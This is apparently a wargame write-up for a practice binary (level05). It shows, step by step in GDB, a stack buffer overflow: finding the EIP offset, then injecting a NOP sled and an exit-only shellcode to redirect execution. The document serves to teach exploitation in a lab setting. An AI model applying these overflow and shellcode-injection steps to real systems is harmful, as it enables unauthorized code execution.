Note : i'll not be revealing the password for this level as its not allowed..

Lets now run it in GDB and exploit :-

Code:

level5@io:/levels$ gdb ./level05
GNU gdb 6.8-debian
Copyright (C) 2008 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law. Type "show copying"
and "show warranty" for details.
This GDB was configured as "i486-linux-gnu"...
(gdb)

Now lets just place a breakpoint at

Now lets place a breakpoint on the beginning of the program and lets run it...

Code:

(gdb) break main
Breakpoint 1 at 0x80483bd

Lets just run it with a argument of 160 A's..
We'll be using basic python code to make our Attack-string(input)...

(gdb) s
Single stepping until exit from function main,
which has no line number information.
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
0x41414141 in ?? ()
(gdb)

Ok that's pretty obvious that we have overwriiten the EIP with 0x41414141...(As its giving a cannot access memory at adress...As 0x41414141 is a random address and is not present in the present program user space and thus, the program cannot jump to it..)

Now lets try some various outputs to get a basic structure of what's happening..

Code:

(gdb) run `python -c 'print"\x41"*140'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /levels/level05 `python -c 'print"\x41"*140'`
Breakpoint 1, 0x080483bd in main ()
(gdb) s
Single stepping until exit from function main,
which has no line number information.
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Cannot access memory at address 0x41414145
(gdb)

So , now can you feel something …

It basically means that to overwrite EIP with our desired Address we conclude with the following attack string :-

(gdb) run `python -c 'print"\x41"*140+"\x42"*4'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /levels/level05 `python -c 'print"\x41"*140+"\x42"*4'`
Breakpoint 1, 0x080483bd in main ()
(gdb) s
Single stepping until exit from function main,
which has no line number information.
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBB
0x42424242 in ?? ()

Boom... We have total control over EIP overwrite...
Now we need to inject our shellcode..and point to it..

Lets first look where our data goes..

Code:

(gdb) run `python -c 'print"\x41"*140+"\x42"*4+"\x43"*10'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /levels/level05 `python -c 'print"\x41"*140+"\x42"*4+"\x43"*10'`
Breakpoint 1, 0x080483bd in main ()
(gdb) s
Single stepping until exit from function main,
which has no line number information.
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBCCCCCCCCCC
0x42424242 in ?? ()
(gdb) x/10bx $esp
0xbfffdc80: 0x43 0x43 0x43 0x43 0x43 0x43 0x43 0x43
0xbfffdc88: 0x43 0x43
(gdb)

So we have a large about of data space in the ESP..We can just overwrite it with our shellcode and overwrite the EIP with its address..

Lets do it!!

We'll again be using the same exit shellcode made in our previous article...

Code:

(gdb) run `python -c 'print"\x41"*140+"\x80\xdc\xff\xbf"+"\x90"*10+"\x31\xc0\xb0\x01\x31\xdb\xb3\x07\xcd\x80"'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /levels/level05 `python -c 'print"\x41"*140+"\x80\xdc\xff\xbf"+"\x90"*10+"\x31\xc0\xb0\x01\x31\xdb\xb3\x07\xcd\x80"'`
Breakpoint 1, 0x080483bd in main ()
(gdb) s
Single stepping until exit from function main,
which has no line number information.
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA��������������1��#1۳̀
0xbfffdc80 in ?? ()
(gdb) continue
Continuing.
Program exited with code 07.
(gdb)

The NOP-Sled is simply a set of \x90(nop) instructions this istruction basically does nothing..
We used this to make our attack-string more usable... as with every new execution of the program the address will somewhat change..If we'll not be using the nop sled … Our attack-string will fail...